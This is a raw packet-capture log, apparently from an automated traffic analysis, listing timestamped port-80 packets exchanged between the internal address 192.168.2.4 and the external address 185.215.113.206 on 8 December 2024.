Dec 8, 2024 19:52:07.657313108 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.657329082 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.657367945 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.657396078 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.657407999 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.657452106 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.658469915 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.658523083 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.658581018 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.658628941 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.661528111 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.661586046 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.661616087 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.661664009 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.664705038 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.664773941 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.664812088 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.664865971 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.667865038 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.667922974 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.667964935 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.668008089 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.670701981 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.670752048 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.670838118 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.670887947 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.673939943 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.673988104 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.674040079 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.674088955 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.676848888 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.676914930 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.676973104 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.677022934 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.679526091 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.679586887 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.679610968 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.679656982 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.682450056 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.682514906 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.682537079 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.682585955 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.686744928 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.686825037 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.686981916 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.687031031 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.689064026 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.689116001 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.689121962 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.689157009 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.691842079 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.691889048 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.691919088 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.691962957 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.694768906 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.694825888 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.694961071 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.695009947 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.697654963 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.697825909 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.697828054 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.697874069 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.704457045 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.704525948 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.704545021 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.704592943 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.717163086 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.717220068 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.717252970 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.717318058 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.718067884 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.718116999 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.718183994 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.718236923 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.720026970 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.720076084 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.720107079 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.720155954 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.721920013 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.721971989 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.722078085 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.722127914 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.723957062 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.724009037 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.724162102 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.724206924 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.725882053 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.725934029 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.726006031 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.726052046 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.727763891 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.727818966 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.727988005 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.728051901 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.729731083 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.729785919 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.729901075 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.729949951 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.732055902 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.732125998 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.732214928 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.732264996 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.733617067 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.733668089 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.733741999 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.733792067 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.735698938 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.735758066 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.735783100 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.735831022 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.737528086 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.737581968 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.737622023 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.737673044 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.739398956 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.739464998 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.739480972 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.739548922 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.741388083 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.741441965 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.741511106 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.741559029 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.743289948 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.743345022 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.743460894 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.743514061 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.745224953 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.745270967 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.745285034 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.745312929 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.747167110 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.747220993 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.747329950 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.747378111 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.749644995 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.749710083 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.749790907 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.749840975 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.751379967 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.751430035 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.751468897 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.751521111 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.753027916 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.753077030 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.753181934 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.753228903 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.755053997 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.755105019 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.755198002 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.755240917 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.757044077 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.757095098 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.757141113 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.757188082 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.758802891 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.758855104 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.758941889 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.758987904 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.760775089 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.760842085 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.785125017 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.785135984 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.785192966 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.785604954 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.785615921 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.785661936 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.786623001 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.786676884 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.786712885 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.786761999 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.788608074 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.788650036 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.788671970 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.788717985 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.790623903 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.790688038 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.790695906 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.790745974 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.792514086 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.792562008 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.792581081 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.792608976 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.794553041 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.794636011 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.794687986 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.794737101 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.796884060 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.796933889 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.796967030 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.797009945 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.798594952 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.798652887 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.798748016 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.798796892 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.800811052 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.800865889 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.846467018 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.846528053 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.846532106 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.846575022 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.847526073 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.847568989 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.847656965 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.847707987 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.849411011 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.849457979 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.849498987 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.849546909 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.851531982 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.851583958 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.851665974 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.851713896 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.853760958 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.853807926 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.853871107 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.853929996 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.855467081 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.855514050 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.855606079 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.855644941 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.857305050 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.857348919 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.857398987 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.857451916 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.858953953 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.859009027 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.859019995 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.859070063 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.860785961 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.860829115 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.861011982 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.861058950 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.862778902 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.862826109 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.862862110 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.862901926 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.864717007 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.864770889 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.864787102 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.864841938 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.866549969 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.866595984 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.866684914 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.866729975 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.868597984 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.868644953 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.868904114 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.868947029 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.870907068 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.870949984 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.871043921 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.871085882 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.872776985 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.872823000 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.872914076 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.872960091 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.874978065 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.875025034 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.875053883 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.875117064 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.876456022 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.876501083 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.876507998 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.876548052 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.878633022 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.878705025 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.878705978 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.878743887 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.880729914 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.880742073 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.880774021 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.880786896 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.882224083 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.882260084 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.882272959 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.882296085 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.883399963 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.883447886 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.883471966 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.883517981 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.884875059 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.884922028 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.884999037 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.885046005 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.886394978 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.886445045 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.886528969 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.886575937 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.887772083 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.887784004 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.887821913 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.911531925 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.911606073 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.912117004 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.912173033 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.912640095 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.912687063 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.912766933 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.912813902 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.914099932 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.914145947 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.914580107 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.914628029 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.914666891 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.914710999 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.915721893 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.915766954 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.915880919 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.915930033 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.916805983 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.916852951 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.916940928 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.916986942 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.917867899 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.917916059 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.918049097 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.918098927 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.919090033 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.919131041 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.919143915 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.919173002 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.920258999 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.920312881 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.920439959 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.920488119 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.921602964 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.921657085 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.921773911 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.921822071 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.922903061 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.922945976 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.922950983 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.922991991 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.923772097 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.923844099 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.923872948 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.923918962 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.924787045 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.924835920 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.924895048 CET	80	49730	185.215.113.206	192.168.2.4
